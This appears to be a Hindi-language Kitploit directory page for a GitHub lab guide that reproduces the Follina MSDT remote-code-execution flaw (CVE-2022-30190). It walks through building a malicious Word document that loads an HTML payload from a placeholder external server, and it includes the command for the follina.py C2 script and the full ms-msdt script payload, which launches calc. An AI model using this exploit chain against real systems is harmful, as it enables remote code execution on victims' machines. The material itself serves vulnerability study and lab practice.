Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30190 — CVE-2022-30190 (Follina) MSDT दूरस्थ कोड निष्पादन भेद्यता के लिए चरण-दर-चरण पुनरुत्पादन मार्गदर्शिका, जिसमें दुर्भावनापूर्ण दस्तावेज़ निर्माण और C2 सर्वर सेटअप शामिल है। | Kitploit
उपकरण/GitHubGitHub/yrkuo/cve-2022-30190
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubyrkuo/cve-2022-30190

CVE-2022-30190

CVE-2022-30190 (Follina) MSDT दूरस्थ कोड निष्पादन भेद्यता के लिए चरण-दर-चरण पुनरुत्पादन मार्गदर्शिका, जिसमें दुर्भावनापूर्ण दस्तावेज़ निर्माण और C2 सर्वर सेटअप शामिल है।

रिपॉजिटरी देखें
13 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30190

जिसे Follina के नाम से भी जाना जाता है

भेद्यता विवरण

Follina Microsoft Support Diagnostic Tool (MSDT) में मौजूद है। जब कोई एप्लिकेशन URL प्रोटोकॉल के माध्यम से MSDT को सहायता के लिए कॉल करता है, तो एक दूरस्थ कोड निष्पादन भेद्यता उत्पन्न होती है। सफल शोषण हैकर को चल रहे एप्लिकेशन की अनुमतियों के आधार पर मनमाना कोड निष्पादित करने की अनुमति देता है।

भेद्यता पुनरुत्पादन वातावरण

* Host OS: Ubuntu 22.04 LST
* Guest OS: Windows 10 Pro x64, version 2004, build 19041.1237
* Microsoft office: word 2016

पुनरुत्पादन प्रक्रिया

दुर्भावनापूर्ण दस्तावेज़ बनाना

Step1 एक Word दस्तावेज़ (.docx) बनाएं और उसमें OLE ऑब्जेक्ट (जैसे Bitmap Image) डालें।
Step2 .docx फ़ाइल को अनज़िप करें, फोल्डर के अंतर्गत word/_rels/document.xml.rels फ़ाइल को संपादित करें। नीचे चित्र में पीले हाइलाइट में दिए गए Target="embeddings/oleObject1.bin" को बदलें Target = "http://<payload_server>/<random_name>.html!" और नया गुण TargetMode = "External" जोड़ें।
rels
Step3 फोल्डर के अंतर्गत word/document.xml फ़ाइल को संपादित करें। नीचे चित्र में पीले हाइलाइट में दिए गए Type="Embed" को बदलें Type="Link" और नया गुण UpdateMode="OnCall" जोड़ें।
doc
Step4 7-zip का उपयोग करके .docx फ़ाइल खोलें (अनज़िप न करें) और उपरोक्त दो फ़ाइलों को .docx फ़ाइल में डालें। इस प्रकार दुर्भावनापूर्ण दस्तावेज़ तैयार हो जाता है।

C2 सर्वर स्थापित करना

John Hammond द्वारा जारी Follina.py डाउनलोड करें। यहाँ बुनियादी कैलकुलेटर कॉल के उदाहरण के रूप में, python3 follina.py -c calc.exe -i eth0

नोट

Follina.py फ़ाइल में line 117-125 मुख्य रूप से दुर्भावनापूर्ण पेलोड (.html) बनाने के लिए है। इसकी सामग्री निम्नलिखित है: <script>location.href... एक स्क्रिप्ट है जो पीड़ित होस्ट पर कैलकुलेटर निष्पादित करेगी। पूरी फ़ाइल बड़ी संख्या में यादृच्छिक वर्णों से भरी होती है, जिसका उद्देश्य फ़ाइल को कम से कम 4096 बाइट तक भरना है। इसका कारण “Follina” MSDT Attack में देखा जा सकता है।

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //pydvwofyowvcmgcaevgukzhjgmfirqpffuiclrgzlobvnrxknespfklndldfazyefpyxjbixgykmzeumodxedsxpaduvcqygjhrxzeqpuhdgcmpzsxkkpdzdielmoiwzknqxtxinxymsnuugffkxvzwxetrl...(4096 bytes)
</script>

संदर्भ

समाचार स्पष्टीकरण Follina.py
दुर्भावनापूर्ण दस्तावेज़
भेद्यता परीक्षण 1
भेद्यता परीक्षण 2
भेद्यता परीक्षण 3

टूल डाउनलोड करें